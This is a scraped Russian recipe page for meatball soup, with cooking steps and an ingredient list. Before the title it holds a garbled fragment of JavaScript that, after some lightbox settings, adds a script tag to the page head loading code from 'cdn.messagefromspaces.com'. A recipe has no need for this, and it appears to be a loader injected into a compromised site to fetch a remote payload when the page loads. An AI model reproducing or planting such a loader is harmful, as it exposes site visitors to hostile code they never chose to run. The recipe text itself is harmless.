Суп с фрикадельками , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Суп с фрикадельками

Суп с фрикаделькамиНа суп с фрикадельками нужен фарш, который можно готовить дома самостоятельно из мяса, к которому вы больше отдаете предпочтение: говядины, свинины, баранины или из смеси различных видов. Мясо повернуть два-три раза через мясорубку, заправить солью, перцем, прибавить мелко накрошенный лук, хорошо выбить, прибавить воды, снова выбить, разделать на мелкие шарики, примерно грамм 10 каждый, закатать в муке или в манной крупе. Приготовить овощи: картофель очистить и порезать небольшими одинаковыми кубиками, сладкий перец – маленькими квадратами, лук измельчить, натереть морковь. Морковь с луком лучше обжарить на сковороде с небольшим количеством масла растительного. После этого овощи залить кипящей водой и варить минут пять. Шарики из фарша одинакового размера помещаем в кастрюлю к овощам. Полная готовность супа с фрикадельками наступит через пятнадцать минут. Где — то минут за пять до окончания процесса варки, в него нужно поместить немного вермишели. Подсолить готовый суп по вкусу и можно подавать к столу.

_________________________________________________________________________________________________________

Ингредиенты для рецепта супа с фрикадельками

1. мясной фарш — 500 гр
2. картофель — 4 — 5 шт (среднего размера)
3. луковица
4. морковь
5. сладкий болгарский перец
6. вермишель
7. соль, перец

Другие рецепты:

Comments are closed.